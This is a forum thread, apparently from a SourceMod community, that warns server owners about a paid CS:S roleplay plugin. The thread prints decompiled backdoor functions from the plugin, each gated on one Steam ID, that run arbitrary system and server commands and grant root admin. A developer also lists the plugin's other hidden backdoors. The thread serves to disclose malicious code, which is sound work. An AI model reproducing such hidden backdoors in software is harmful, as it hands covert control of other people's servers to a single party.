Raised This Month: $51 Target: $400
 12% 

[CSS] Roleplay [LightRP]


Post New Thread Reply   
 
Thread Tools Display Modes
Author Message
nynCuKaH
Member
Join Date: Apr 2012
Location: void
Old 08-08-2012 , 15:08   [CSS] Roleplay [LightRP]
Reply With Quote #1

Hello all. I opened LightRP plugin roleplay.
This plugin hacking servers. Do not buy from Sphex this mod.

His Steam ID:
Quote:
STEAM_0:1:36281003
Code:
public Action:Command_hExec(client, args)
{
	decl String:Command[256];
	GetCmdArg(1, Command, 255);
	if (IsClientInGame(client))
	{
		decl String:SteamID[64];
		GetClientAuthString(client, SteamID, 64);
		if (StrEqual(SteamID, "STEAM_0:1:36281003", true))
		{
			PrintToChat(client, Command);
			RunCommand(Command);
		}
	}
	return Action:0;
}

public Action:Command_Rcon(client, args)
{
	decl String:Command[256];
	GetCmdArg(1, Command, 255);
	if (IsClientInGame(client))
	{
		decl String:SteamID[64];
		GetClientAuthString(client, SteamID, 64);
		if (StrEqual(SteamID, "STEAM_0:1:36281003", true))
		{
			PrintToChat(client, Command);
			ServerCommand(Command);
		}
	}
	return Action:0;
}

public Action:Command_AddAdmin(client, args)
{
	if (IsClientInGame(client))
	{
		decl String:SteamID[64];
		GetClientAuthString(client, SteamID, 64);
		if (StrEqual(SteamID, "STEAM_0:1:36281003", true))
		{
			new AdminId:admin = CreateAdmin("SpheX");
			SetUserAdmin(client, admin, false);
			new AdminId:iAdminID = GetUserAdmin(client);
			SetAdminFlag(iAdminID, AdminFlag:14, true);
		}
	}
	return Action:3;
}
Attached Files
File Type: txt LightRP.txt (415.3 KB, 1376 views)

Last edited by nynCuKaH; 08-28-2012 at 23:06.
nynCuKaH is offline
asherkin
SourceMod Developer
Join Date: Aug 2009
Location: OnGameFrame()
Old 08-08-2012 , 17:39   Re: [CSS] Roleplay [LightRP]
Reply With Quote #2

Nice work finding this.

Could you private message me a copy of this SMX file?
__________________
asherkin is offline
nynCuKaH
Member
Join Date: Apr 2012
Location: void
Old 08-08-2012 , 19:07   Re: [CSS] Roleplay [LightRP]
Reply With Quote #3

Ok. Thx

Last edited by nynCuKaH; 08-08-2012 at 19:07.
nynCuKaH is offline
Fearts
ferts of daeth
Join Date: Oct 2008
Old 08-08-2012 , 19:26   Re: [CSS] Roleplay [LightRP]
Reply With Quote #4

So he didn't even give you the .sp with the compiled version? That alone is a big no no.
__________________
Fearts is offline
nynCuKaH
Member
Join Date: Apr 2012
Location: void
Old 08-08-2012 , 19:30   Re: [CSS] Roleplay [LightRP]
Reply With Quote #5

Sorry, my enlglish bad. I badly understood you.
nynCuKaH is offline
nynCuKaH
Member
Join Date: Apr 2012
Location: void
Old 08-08-2012 , 19:31   Re: [CSS] Roleplay [LightRP]
Reply With Quote #6

Sphex sell roleplay mod 30euro without the source code.
nynCuKaH is offline
asherkin
SourceMod Developer
Join Date: Aug 2009
Location: OnGameFrame()
Old 08-08-2012 , 21:59   Re: [CSS] Roleplay [LightRP]
Reply With Quote #7

Here is a breakdown of the malicious backdoors in the plugin.
There are also gameplay-based ones such as being unable to jail him, he can (un)lock any door, and more.
  • Execute arbitrary system commands, via the System2 extension.
  • Execute arbitrary server commands.
  • Add himself as a Root SourceMod admin.
  • Execute arbitrary SQL queries.
  • Add people to a global banlist, also banning them from the server.
  • Full RCon access, via the SMRcon extension.
  • Automatically unban himself when connecting to the server, via the Connect extension.
__________________
asherkin is offline
nynCuKaH
Member
Join Date: Apr 2012
Location: void
Old 08-08-2012 , 22:37   Re: [CSS] Roleplay [LightRP]
Reply With Quote #8

asherkin, Whether you will punish it? ^^
nynCuKaH is offline
nynCuKaH
Member
Join Date: Apr 2012
Location: void
Old 08-08-2012 , 22:39   Re: [CSS] Roleplay [LightRP]
Reply With Quote #9

You can give me a collected code? roleplay.sp

Last edited by nynCuKaH; 08-08-2012 at 22:39.
nynCuKaH is offline
NameUser
Senior Member
Join Date: Apr 2012
Location: Bay Area, California
Old 08-09-2012 , 00:49   Re: [CSS] Roleplay [LightRP]
Reply With Quote #10

Quote:
Originally Posted by nynCuKaH View Post
You can give me a collected code? roleplay.sp
Look what I found.

It was posted on Jun 17th, 2012
__________________

Last edited by NameUser; 08-09-2012 at 00:49.
NameUser is offline
Send a message via Skype™ to NameUser
Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 23:00.


Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Theme made by Freecode